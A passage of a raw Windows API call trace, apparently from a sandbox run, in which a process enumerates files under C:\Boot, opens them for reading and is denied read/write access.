lpMultiByteStr="C:\\Boot\\fi-FI\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0069.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0069.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0069.681] AreFileApisANSI () returned 1 [0069.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0069.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fi-FI\\memtest.exe.mui") returned 30 [0069.681] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0069.681] GetFileType (hFile=0x41c) returned 0x1 [0069.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.681] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.681] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.681] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.682] CloseHandle (hObject=0x41c) returned 1 [0069.682] AreFileApisANSI () returned 1 [0069.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0069.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fi-FI\\memtest.exe.mui") returned 30 [0069.682] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.682] GetLastError () returned 0x5 [0069.682] GetLastError () returned 0x5 [0069.682] SetLastError (dwErrCode=0x5) [0069.682] GetLastError () returned 0x5 [0069.682] SetLastError (dwErrCode=0x5) [0069.682] GetLastError () returned 0x5 [0069.682] SetLastError (dwErrCode=0x5) [0069.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0069.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0069.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.682] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓놠")) returned 0 [0069.682] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0069.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0069.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0069.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0069.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0069.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.683] AreFileApisANSI () returned 1 [0069.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts", lpUsedDefaultChar=0x0) returned 14 [0069.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0069.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0069.684] AreFileApisANSI () returned 1 [0069.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88770 [0069.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88770, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\Fonts") returned 14 [0069.684] CreateFileW (lpFileName="C:\\Boot\\Fonts" (normalized: "c:\\boot\\fonts"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.684] GetLastError () returned 0x5 [0069.684] GetLastError () returned 0x5 [0069.684] SetLastError (dwErrCode=0x5) [0069.684] GetLastError () returned 0x5 [0069.684] SetLastError (dwErrCode=0x5) [0069.684] GetLastError () returned 0x5 [0069.684] SetLastError (dwErrCode=0x5) [0069.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.684] AreFileApisANSI () returned 1 [0069.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88388 [0069.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88388, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\Fonts") returned 14 [0069.684] CreateFileW (lpFileName="C:\\Boot\\Fonts" (normalized: "c:\\boot\\fonts"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.684] GetLastError () returned 0x5 [0069.684] GetLastError () returned 0x5 [0069.684] SetLastError (dwErrCode=0x5) [0069.685] GetLastError () returned 0x5 [0069.685] SetLastError (dwErrCode=0x5) [0069.685] GetLastError () returned 0x5 [0069.685] SetLastError (dwErrCode=0x5) [0069.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.685] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.685] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.685] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.685] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.685] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0069.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0069.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0069.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.685] FindFirstFileExW (in: lpFileName="C:\\Boot\\Fonts\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x783d0 [0069.692] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.692] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef782dd9, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x386467, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0069.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0069.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0069.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0069.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0069.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0069.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0069.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0069.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0069.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.693] AreFileApisANSI () returned 1 [0069.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\chs_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\chs_boot.ttf", lpUsedDefaultChar=0x0) returned 27 [0069.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0069.693] AreFileApisANSI () returned 1 [0069.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0069.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78150 [0069.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x78150, cchWideChar=27 | out: lpWideCharStr="C:\\Boot\\Fonts\\chs_boot.ttf") returned 27 [0069.693] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0069.695] GetFileType (hFile=0x41c) returned 0x1 [0069.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78150 | out: hHeap=0x20000) returned 1 [0069.695] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.695] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.695] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.695] CloseHandle (hObject=0x41c) returned 1 [0069.696] AreFileApisANSI () returned 1 [0069.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0069.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78550 [0069.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x78550, cchWideChar=27 | out: lpWideCharStr="C:\\Boot\\Fonts\\chs_boot.ttf") returned 27 [0069.696] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.696] GetLastError () returned 0x5 [0069.696] GetLastError () returned 0x5 [0069.696] SetLastError (dwErrCode=0x5) [0069.696] GetLastError () returned 0x5 [0069.696] SetLastError (dwErrCode=0x5) [0069.696] GetLastError () returned 0x5 [0069.696] SetLastError (dwErrCode=0x5) [0069.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78550 | out: hHeap=0x20000) returned 1 [0069.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.696] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.696] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.696] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a1dbea, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef81cc08, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x3b2e0a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0069.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0069.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0069.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0069.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0069.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0069.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0069.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 